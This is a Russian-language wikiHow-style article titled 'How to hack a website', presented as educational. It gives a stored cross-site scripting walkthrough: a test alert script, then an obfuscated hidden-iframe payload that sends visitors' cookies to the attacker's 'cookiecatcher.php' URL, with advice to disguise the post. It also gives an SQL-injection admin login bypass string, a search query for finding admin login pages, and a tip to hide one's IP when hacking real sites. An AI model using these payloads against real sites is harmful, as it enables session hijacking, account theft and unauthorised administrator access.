Как взломать веб–сайт

Загрузить PDF
Загрузить PDF

Обратите внимание: эта инструкция приведена исключительно в образовательных целях, чтобы помочь изучить методы взлома в законных целях и понять принцип работы хакеров для защиты своих веб-сайтов. Эта инструкция поможет получить доступ к веб-сайтам с НИЗКИМ уровнем защиты.

Метод 1
Метод 1 из 3:

Применение межсайтового скриптинга

Загрузить PDF
  1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-460px-Hack-a-Website-Step-1-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-728px-Hack-a-Website-Step-1-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Хороший пример - доска объявлений. Помните, если сайт хорошо защищен, это не сработает.
  2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-460px-Hack-a-Website-Step-2-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-728px-Hack-a-Website-Step-2-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Вам нужно в тело поста вставить специальный код, собирающий данные тех, кто на него кликнет.
    • Вы захотите проверить, отсеивает ли система код. Опубликуйте <script...>alert(“test”)</...script> (не забудьте убрать “…”). Если при нажатии на свой пост появляется окно с предупреждением, тогда этот сайт уязвим для атаки.
  3. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-460px-Hack-a-Website-Step-3-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-728px-Hack-a-Website-Step-3-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Цель этой атаки - собрать пользовательские данные типа "cookie", хранящие информацию об учетных записях пользователей. Ее можно использовать для входа в их аккаунты на уязвимых веб-сайтах. Вам потребуется php-скрипт, который будет воровать куки вашей цели и перенаправлять их на ваш сайт. Загрузите php-скрипт на веб-сайт, к которому у вас есть доступ и который поддерживает php. Пример кода php-скрипта можно найти в разделе "Примеры".
  4. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-460px-Hack-a-Website-Step-4-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-728px-Hack-a-Website-Step-4-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Введите в тело поста JavaScript-код, который будет воровать куки и отправлять их на ваш сайт. Чтобы сделать пост менее подозрительным и уберечь его от удаления, после кода впишите какой-нибудь текст.
    • Пример кода будет выглядеть следующим образом: <...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”ВАШURL/cookiecatcher.php?c=”+document.cookie)><.../iframe> (удалите ...).
  5. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-460px-Hack-a-Website-Step-5-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-728px-Hack-a-Website-Step-5-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    После этого можете использовать сохраненные у вас на веб-сайте данные куки для любых целей.
    Реклама
Метод 2
Метод 2 из 3:

Выполнение инъекционных атак

Загрузить PDF
  1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-460px-Hack-a-Website-Step-6-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-728px-Hack-a-Website-Step-6-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Вам нужно найти уязвимый сайт с легкодоступным входом в качестве администратора. Попробуйте поискать в Google по запросу admin login.asp.
  2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-460px-Hack-a-Website-Step-7-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-728px-Hack-a-Website-Step-7-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    В поле "логин" введите admin, а в качестве пароля используйте одну из нескольких комбинаций. Может быть много разных вариантов, но распространенным параметром является 1’or’1’=’1.
  3. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-460px-Hack-a-Website-Step-8-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-728px-Hack-a-Website-Step-8-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Вам потребуется некоторое время для проб и ошибок.
  4. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-460px-Hack-a-Website-Step-9-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-728px-Hack-a-Website-Step-9-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    В конце концов, у вас должно получиться найти комбинацию, которая позволит зайти на веб-сайт под логином администратора, конечно, если сайт уязвим к атакам.
    Реклама
Метод 3
Метод 3 из 3:

Основа для успеха

Загрузить PDF
  1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-460px-Hack-a-Website-Step-10-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-728px-Hack-a-Website-Step-10-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Если вы действительно хотите научится взламывать веб-сайты, вам нужно понять принцип работы компьютера и других технологий. Изучите такие языки программирования, как Python или SQL, они позволят вам лучше владеть компьютером и найти слабые места систем.
  2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-460px-Hack-a-Website-Step-11-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-728px-Hack-a-Website-Step-11-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Чтобы взламывать веб-сайты, вам нужно иметь четкое представление о языках html и javascript. Это требует немало времени, но в интернете достаточно бесплатных способов для изучения, поэтому главное - желание, а возможности всегда найдутся.
  3. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-460px-Hack-a-Website-Step-12-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-728px-Hack-a-Website-Step-12-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    "Белые" хакеры - это те, кто использует свои знания на благо добра, выявляя уязвимости систем безопасности и делая этим Интернет лучшим местом для всех. Если вы хотите научиться взлому, чтобы использовать его на благо добра или защитить ваш собственный веб-сайт, возможно, вам понадобится консультация "белых" хакеров.
  4. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-460px-Hack-a-Website-Step-13-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-728px-Hack-a-Website-Step-13-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Если вы хотите стать хакером или защитить себя, вам предстоит во многом разобраться. На данный момент существует множество дыр в безопасности веб-сайтов и их список пополняется с каждым днем, поэтому вы постоянно должны обучаться.
  5. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-460px-Hack-a-Website-Step-14-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-728px-Hack-a-Website-Step-14-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Поскольку список возможных путей взлома постоянно меняется, вы должны идти в ногу со временем. Если сейчас вы защищены от некоторых типов атак, это не значит, что вы будете в безопасности завтра!
    Реклама

Советы

  • Почитайте хакерские форумы, чтобы получить много полезных советов.
Реклама

Предупреждения

  • Если вы решили испробовать свои хакерские навыки в реальном мире, не забудьте скрыть свой IP-адрес с помощью программного обеспечения, доступного в сети Интернет.
  • Прочитав эту статью, вы не станете хакером немедленно. Совершенствуйте свои навыки и практикуйтесь, практикуйтесь и еще раз практикуйтесь.
  • Помните, деятельность хакеров является незаконной. Если вас поймают, это ваша вина.
Реклама

Дополнительные статьи

Как
прикинуться хакером
Как
обнаружить спрятанные камеры и микрофоны
Как
запустить программу из командной строки
Как
подключить контроллер PS4 к игровой приставке PS5
Как
сделать стилус
Как
использовать контроллер PS3 на компьютере
Как
подключить к компьютеру еще один жесткий диск
Как
найти потерянный пульт от телевизора
Как
создать электромагнитный импульс
Как
установить жесткий диск
Как
подключить HDMI к телевизору
Как
сделать FM антенну
Реклама

Источники

  1. http://defencely.com/blog/10-popular-ways-hackers-hack-website/
  2. http://www.benwiggy.com/hacking/website_hacking.php

Об этой статье

На других языках
Эту страницу просматривали 55 619 раз.

Была ли эта статья полезной?

Реклама